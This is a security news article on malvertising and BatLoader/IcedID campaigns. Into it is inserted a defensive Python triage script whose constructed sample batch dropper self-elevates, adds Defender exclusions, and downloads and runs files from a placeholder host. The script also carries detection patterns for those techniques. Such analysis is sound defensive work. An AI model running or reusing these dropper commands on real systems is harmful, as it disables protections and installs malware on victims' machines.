Black SEO Offerings Gaining Momentum in Underground Forums – BankInfoSecurity.com
Cybercriminals are leveraging Google’s paid advertisement service to push malicious sites on top search results in order to trick victims into downloading malware such as IcedID and Gozi Trojan.
Researchers at Sophos identified multiple campaigns using malvertising to lure unsuspecting users into downloading malware.
“When a user searches for a related term and clicks through to the malicious site, the attackers check the Referer header to confirm the user came via the search engine, and then entice them into downloading malware disguised as a legitimate software application,” the researchers said.
Christopher Budd, director of threat research at Sophos, told Information Security Media Group that there has been a resurgence in the use of malvertising in a wide variety of campaigns and advertisements for this type of service on underground forums.
“We believe it could be attackers working around changes Microsoft made last year to protect against malicious macros. The growth of cybercrime as a service could also explain the growing availability and use of malvertising by threat actors,” Budd said.
Malvertising has many advantages, said Budd. Cybercriminals can use it to specifically target users, particularly geographically. And these types of malware campaigns can be hard for defenders to track and take down, he said.
Recently, researchers at Trend Micro uncovered a threat activity cluster tied to the BlackCat ransomware-as-a-service group that used targeted keywords on the web pages of legitimate organizations to deploy malware (see: BlackCat Uses Malvertising to Push Backdoor).
Sophos researchers also found campaigns targeting users searching for AI-related tools such as Midjourney and ChatGPT. “It’s likely that criminals will continue to evolve their malvertising campaigns, and the security community should be on alert,” Budd said.
The latest malvertising campaigns involving IcedID used lures impersonating widely installed software: communications platforms such as Microsoft Teams and Slack, the Brave browser and LibreOffice; IT administration tools such as WebEx, GoTo, AnyDesk and TeamViewer; and finance-related software.
In another campaign, researchers observed that a VHD container had been downloaded from a malicious site. When mounted, it revealed Installer.bat, a batch file containing simple commands intended to raise execution privileges, add scanning exclusions for Windows Defender, and download and execute a remote batch script and an executable.
Researchers found that the URLs in the batch script contained hash values identical to previous BatLoader campaigns. The initial access malware loader, BatLoader, allows threat actors to download more sophisticated malware such as the prominent commodity info stealer Raccoon Stealer and the backdoor Gozi/Ursnif.
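The two paragraphs above describe a dropper with three tell-tale behaviours (self-elevation, Defender exclusions, remote download-and-execute) and URLs whose embedded hash-like tokens matched earlier BatLoader infrastructure. The following triage script is an added example, not Sophos's code and not the real Installer.bat: it scans batch-file text for those behaviours, extracts URLs, and pulls out any 32-hex-character path tokens so they can be compared against an analyst's IOC list. The batch sample, the hostname `cdn.example.invalid` and the "known" hash are constructed placeholders.

```python
"""Static triage of a Windows batch dropper for the behaviours described above.

Added example. The BAT text and the IOC hash below are constructed and stand in
for a real sample and a real threat-intel feed; nothing here is the campaign's
actual Installer.bat.
"""
import re
from dataclasses import dataclass, field

# Constructed sample: NOT the campaign's real Installer.bat.
SAMPLE_BAT = r"""@echo off
:: re-launch elevated if not already running as admin
net session >nul 2>&1 || (powershell -Command "Start-Process '%~f0' -Verb RunAs" & exit /b)
powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public'"
powershell -Command "Add-MpPreference -ExclusionExtension '.exe'"
powershell -Command "Invoke-WebRequest https://cdn.example.invalid/dl/3f9c2a1b7e6d4c5a9b8f0e1d2c3b4a59/stage2.bat -OutFile C:\Users\Public\stage2.bat"
curl -o C:\Users\Public\update.exe https://cdn.example.invalid/bin/9a8b7c6d5e4f3a2b1c0d9e8f7a6b5c41.exe
start /b C:\Users\Public\stage2.bat
start /b C:\Users\Public\update.exe
"""

# Constructed benign control: an admin backup script with none of the behaviours.
BENIGN_BAT = r"""@echo off
echo Backing up logs
xcopy C:\logs D:\backup\logs /E /I /Y
"""

# Constructed placeholder for an IOC list of hash tokens seen in earlier campaign URLs.
KNOWN_IOC_HASHES = {"3f9c2a1b7e6d4c5a9b8f0e1d2c3b4a59"}

# Heuristics for the three behaviours the article names, plus execution of what
# was dropped. Case-insensitive because cmd.exe and PowerShell are.
BEHAVIOURS = [
    # UAC self-elevation idioms and the common "am I admin?" check
    ("elevate", re.compile(r"-Verb\s+RunAs|runas\s+/user|net\s+session", re.I)),
    # Defender exclusions added via the Add-MpPreference cmdlet
    ("defender_exclusion", re.compile(r"Add-MpPreference\s+-Exclusion(Path|Extension|Process)", re.I)),
    # living-off-the-land downloaders
    ("remote_download", re.compile(
        r"Invoke-WebRequest|\biwr\b|curl(\.exe)?\s|certutil.*-urlcache|bitsadmin.*/transfer|DownloadFile", re.I)),
    # a line that launches a dropped script or binary
    ("execute_dropped", re.compile(r"^\s*(start\b|call\b).*\.(exe|bat|cmd|ps1)\b", re.I | re.M)),
]

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)
# 32 hex characters not flanked by other hex characters: MD5-shaped path tokens
HEX32_RE = re.compile(r"(?<![0-9a-f])[0-9a-f]{32}(?![0-9a-f])", re.I)


@dataclass
class TriageResult:
    behaviours: set = field(default_factory=set)
    urls: list = field(default_factory=list)
    hashlike_tokens: set = field(default_factory=set)
    known_ioc_hits: set = field(default_factory=set)

    @property
    def verdict(self) -> str:
        # An IOC match is decisive; otherwise require the full behaviour chain.
        if self.known_ioc_hits or len(self.behaviours) >= 3:
            return "malicious"
        return "suspicious" if self.behaviours else "clean"


def triage_batch(text: str, known_hashes=KNOWN_IOC_HASHES) -> TriageResult:
    """Flag dropper behaviours and compare URL hash tokens against known IOCs."""
    result = TriageResult()
    for name, rx in BEHAVIOURS:
        if rx.search(text):
            result.behaviours.add(name)
    result.urls = URL_RE.findall(text)
    for url in result.urls:
        for token in HEX32_RE.findall(url):
            result.hashlike_tokens.add(token.lower())
    result.known_ioc_hits = result.hashlike_tokens & {h.lower() for h in known_hashes}
    return result


if __name__ == "__main__":
    for label, bat in (("sample", SAMPLE_BAT), ("benign", BENIGN_BAT)):
        r = triage_batch(bat)
        print(f"{label}: verdict={r.verdict} behaviours={sorted(r.behaviours)}")
        print(f"  urls={r.urls}")
        print(f"  hash-like tokens={sorted(r.hashlike_tokens)} ioc_hits={sorted(r.known_ioc_hits)}")
```

The hash-token comparison is the part that turns the "identical hash values" observation into a reusable check: once a campaign's URL tokens are in the IOC set, any new dropper that reuses the same infrastructure path is caught regardless of how its commands are rearranged. The behaviour heuristics are deliberately coarse and will flag legitimate admin scripts that add Defender exclusions, so treat "suspicious" as a triage queue, not a block decision.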
Sophos researchers analyzed prominent criminal marketplaces and observed a significant number of advertisements for and discussion about SEO poisoning, malvertising and related services, going back to 2016.
Most recently, bad actors have listed compromised Google Ads accounts for sale. The researchers also observed the sale of so-called Black SEO services as part of a bundle, along with other malware-related listings.
“Marketplace users have a keen interest in SEO poisoning and malvertising,” the researchers said. “This may be because malvertising offers several advantages to threat actors: It allows them to target specific regions, and because victims are already looking to download something, the probability of infection may increase.”
Malvertising also bypasses email filters and can convince users to click a link or download and open an attachment.
Assistant Editor, Global News Desk, ISMG
Nair previously worked at TechCircle, IDG, Times Group and other publications, where he reported on developments in enterprise technology, digital transformation and other issues.